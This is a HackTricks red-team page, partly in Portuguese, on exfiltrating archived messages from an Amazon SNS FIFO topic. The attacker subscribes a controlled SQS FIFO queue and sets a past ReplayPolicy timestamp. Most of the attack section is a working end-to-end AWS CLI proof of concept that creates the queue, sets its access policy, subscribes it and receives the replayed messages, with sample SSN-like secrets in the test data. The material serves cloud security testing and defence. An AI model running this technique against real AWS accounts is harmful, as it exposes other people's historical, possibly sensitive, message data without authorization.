SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription

Reading time: 5 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

Abuso do arquivamento de mensagens de um tópico Amazon SNS FIFO para reproduzir e exfiltrar mensagens publicadas anteriormente para uma fila SQS FIFO controlada pelo atacante, configurando o ReplayPolicy da assinatura.

Service: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
Requirements: Topic must have ArchivePolicy enabled (message archiving). Attacker can Subscribe to the topic and set attributes on their subscription. Attacker controls an SQS FIFO queue and allows the topic to send messages.
Impact: Historical messages (published before the subscription) can be delivered to the attacker endpoint. Replayed deliveries are flagged with Replayed=true in the SNS envelope.

Pré-requisitos

SNS FIFO topic with archiving enabled: ArchivePolicy (e.g., { "MessageRetentionPeriod": "2" } for 2 days).
Atacante tem permissões para:
sns:Subscribe on the target topic.
sns:SetSubscriptionAttributes on the created subscription.
Atacante possui uma fila SQS FIFO e pode anexar uma política de fila permitindo sns:SendMessage from the topic ARN.

Permissões IAM mínimas

On topic: sns:Subscribe.
On subscription: sns:SetSubscriptionAttributes.
On queue: sqs:SetQueueAttributes for policy, and queue policy permitting sns:SendMessage from the topic ARN.

Attack: Replay archived messages to attacker SQS FIFO

O atacante subscreve sua fila SQS FIFO ao tópico SNS FIFO da vítima e, em seguida, define o ReplayPolicy para um timestamp no passado (dentro da janela de retenção do arquivo). O SNS imediatamente reexecuta as mensagens arquivadas correspondentes para a nova assinatura e as marca com Replayed=true.

Notes:

The timestamp used in ReplayPolicy must be >= the topic's BeginningArchiveTime. If it's earlier, the API returns Invalid StartingPoint value.
For SNS FIFO Publish, you must specify a MessageGroupId (and either dedup ID or enable ContentBasedDeduplication).

POC CLI de ponta a ponta (us-east-1)

bash

REGION=us-east-1
# Compute a starting point; adjust later to >= BeginningArchiveTime if needed
TS_START=$(python3 - << 'PY'
from datetime import datetime, timezone, timedelta
print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ'))
PY
)

# 1) Create SNS FIFO topic with archiving (2-day retention)
TOPIC_NAME=htreplay$(date +%s).fifo
TOPIC_ARN=$(aws sns create-topic --region "$REGION" \
--cli-input-json '{"Name":"'"$TOPIC_NAME"'","Attributes":{"FifoTopic":"true","ContentBasedDeduplication":"true","ArchivePolicy":"{\"MessageRetentionPeriod\":\"2\"}"}}' \
--query TopicArn --output text)

echo "Topic: $TOPIC_ARN"

# 2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId)
for i in $(seq 1 3); do
aws sns publish --region "$REGION" --topic-arn "$TOPIC_ARN" \
--message "{\"orderId\":$i,\"secret\":\"ssn-123-45-678$i\"}" \
--message-group-id g1 >/dev/null
done

# 3) Create attacker SQS FIFO queue and allow only this topic to send
Q_URL=$(aws sqs create-queue --queue-name ht-replay-exfil-q-$(date +%s).fifo \
--attributes FifoQueue=true --region "$REGION" --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region "$REGION" \
--attribute-names QueueArn --query Attributes.QueueArn --output text)

cat > /tmp/ht-replay-sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$TOPIC_ARN"}}}]}
JSON
# Use CLI input JSON to avoid quoting issues
aws sqs set-queue-attributes --region "$REGION" --cli-input-json "$(python3 - << 'PY'
import json, os
print(json.dumps({
'QueueUrl': os.environ['Q_URL'],
'Attributes': {'Policy': open('/tmp/ht-replay-sqs-policy.json').read()}
}))
PY
)"

# 4) Subscribe the queue to the topic
SUB_ARN=$(aws sns subscribe --region "$REGION" --topic-arn "$TOPIC_ARN" \
--protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)

echo "Subscription: $SUB_ARN"

# 5) Ensure StartingPoint is >= BeginningArchiveTime
BEGIN=$(aws sns get-topic-attributes --region "$REGION" --topic-arn "$TOPIC_ARN" --query Attributes.BeginningArchiveTime --output text)
START=${TS_START}
if [ -n "$BEGIN" ]; then START="$BEGIN"; fi

aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$SUB_ARN" \
--attribute-name ReplayPolicy \
--attribute-value "{\"PointType\":\"Timestamp\",\"StartingPoint\":\"$START\"}"

# 6) Receive replayed messages (note Replayed=true in the SNS envelope)
aws sqs receive-message --queue-url "$Q_URL" --region "$REGION" \
--max-number-of-messages 10 --wait-time-seconds 10 \
--message-attribute-names All --attribute-names All

Impacto

Impacto Potencial: Um atacante que conseguir inscrever-se em um tópico SNS FIFO com arquivamento ativado e definir ReplayPolicy na sua assinatura pode imediatamente reproduzir e exfiltrar mensagens históricas publicadas nesse tópico, não apenas mensagens enviadas depois que a assinatura foi criada. As mensagens entregues incluem uma flag Replayed=true no envelope do SNS.

tip